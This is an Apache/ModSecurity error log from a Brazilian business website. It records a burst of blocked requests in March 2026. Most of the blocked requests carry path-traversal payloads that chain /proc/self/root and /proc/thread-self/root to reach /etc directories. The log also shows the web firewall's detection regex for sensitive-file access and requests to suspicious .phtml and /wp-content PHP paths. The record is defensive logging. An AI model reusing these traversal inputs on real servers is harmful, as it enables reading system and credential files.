[Fri Mar 20 12:26:14.861847 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.241.31:39608] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nFvqxLDW4GITHUkQkPwAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:16.849999 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:39620] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nGPqxLDW4GITHUkQkQQAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:19.405798 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.241.31:56866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nG_qxLDW4GITHUkQkSwAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:20.830998 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.241.31:56888] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nHLninkcc-iUj5AqUdgAAA5A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:22.128231 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.241.31:56898] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nHgF0L0L-SsrnPo6hPAAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:23.395018 2026] [:error] [pid 11167:tid 140411649607424] [client 74.7.241.31:56904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nH_HIg5MgXLBnicMtqgAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:24.723147 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.241.31:56912] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nILninkcc-iUj5AqUdwAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:26.062067 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:56918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nIuoXxyEfFpUF8f-5NwAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:27.351455 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.241.31:51394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nI_XLqtnMIWvjpaLWggAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:28.563850 2026] [:error] [pid 9818:tid 140411641214720] [client 57.141.18.91:35962] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1nJF1pVZ5mVmJwsFNnkwAAAEw"]
[Fri Mar 20 12:26:28.702947 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.241.31:51400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nJPXLqtnMIWvjpaLWhQAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:30.009014 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:51410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nJuoXxyEfFpUF8f-5OAAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:31.330508 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.241.31:51422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nJ11pVZ5mVmJwsFNnlAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:32.711045 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:51430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nKOoXxyEfFpUF8f-5PwAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:33.987801 2026] [:error] [pid 9818:tid 140411725141760] [client 74.7.241.31:51442] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nKV1pVZ5mVmJwsFNnlQAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:26:49.363488 2026] [mime_magic:error] [pid 15826:tid 140411699963648] (70014)End of file found: [client 74.7.241.31:51446] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/lib/yum/yumdb
[Fri Mar 20 12:26:58.983156 2026] [:error] [pid 26799:tid 140411691570944] [client 57.141.18.21:37030] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1nQta6ubjKNq_cu4YWuAAAA0Y"]
[Fri Mar 20 12:27:02.561904 2026] [mime_magic:error] [pid 11642:tid 140411683178240] (70014)End of file found: [client 57.141.18.115:37150] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:27:07.742498 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:52958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nS9a6ubjKNq_cu4YW0gAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:27:16.643129 2026] [:error] [pid 21219:tid 140411725141760] [client 57.141.18.86:37574] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1nVPXLqtnMIWvjpaLWrAAAAoI"]
[Fri Mar 20 12:27:16.802015 2026] [:error] [pid 11642:tid 140411716749056] [client 57.141.18.11:37584] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1nVLninkcc-iUj5AqUkwAAA4M"]
[Fri Mar 20 12:27:18.009113 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.0:37506] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1nVjJ3M9BSuKP7CAZjhQAAAJc"]
[Fri Mar 20 12:27:24.730930 2026] [:error] [pid 11642:tid 140411708356352] [client 204.12.208.18:60230] [client 204.12.208.18] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/wp-content/js11e544/index.php"] [unique_id "ab1nXLninkcc-iUj5AqUlgAAA4Q"], referer: https://bandeirantesbombas.com.br/wp-content/js11e544/index.php
[Fri Mar 20 12:27:52.762825 2026] [mime_magic:error] [pid 31215:tid 140411616036608] (70014)End of file found: [client 57.141.18.38:38616] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:28:24.363015 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:56424] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1nmNa6ubjKNq_cu4YXHwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
